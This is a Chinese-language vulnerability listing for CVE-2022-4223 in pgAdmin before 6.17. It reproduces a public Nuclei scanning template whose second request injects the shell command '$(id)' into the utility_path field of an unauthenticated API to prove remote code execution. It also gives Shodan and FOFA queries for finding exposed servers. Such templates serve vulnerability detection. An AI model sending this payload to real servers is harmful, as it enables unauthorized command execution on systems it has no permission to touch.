CVE-2022-4223: pgAdmin < 6.17 - Unauthenticated Remote Code Execution

日期: 2026-01-24 | 影响软件: pgAdmin | POC: 已公开

漏洞描述

pgAdmin prior to 6.17 contains an insecure HTTP API caused by improper access control, letting unauthenticated users execute arbitrary external utilities via path manipulation, exploit requires no authentication.

PoC代码[已公开]

id: CVE-2022-4223

info:
  name: pgAdmin < 6.17 - Unauthenticated Remote Code Execution
  author: 0x_Akoko
  severity: critical
  description: |
    pgAdmin prior to 6.17 contains an insecure HTTP API caused by improper access control, letting unauthenticated users execute arbitrary external utilities via path manipulation, exploit requires no authentication.
  impact: |
    Attackers can execute arbitrary external utilities on the server, potentially leading to remote code execution or system compromise.
  remediation: |
    Update to version 6.17 or later to fix the security issue.
  reference:
    - https://github.com/advisories/GHSA-3v6v-2x6p-32mc
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4223
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-4223
    epss-score: 0.78158
    epss-percentile: 0.98971
    cwe-id: CWE-94,CWE-862
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.title:"pgAdmin"
    fofa-query: title="pgAdmin"
  tags: cve,cve2022,pgadmin,rce,unauth

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /login HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: csrf
        part: body
        group: 1
        regex:
          - 'name="csrf_token"[^>]*value="([^"]+)"'
        internal: true

  - raw:
      - |
        POST /misc/validate_binary_path HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        X-pgA-CSRFToken: {{csrf}}
        Referer: {{RootURL}}/browser/

        {"utility_path":"/tmp/$(id)"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "uid=", "gid=")'
        condition: and

    extractors:
      - type: regex
        part: body
        regex:
          - 'uid=[0-9]+\([a-zA-Z0-9_-]+\)\s*gid=[0-9]+\([a-zA-Z0-9_-]+\)'
# digest: 4a0a0047304502200d5e03655117bf5ef9878ecd5bdbda97b44148f1e5c3d3cc1117f41b4813b8e4022100c96abd2d7db05763c2dc84bdd8d607f2837af7e04da87d1da5395b527679cf60:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-4223.yaml

相关漏洞推荐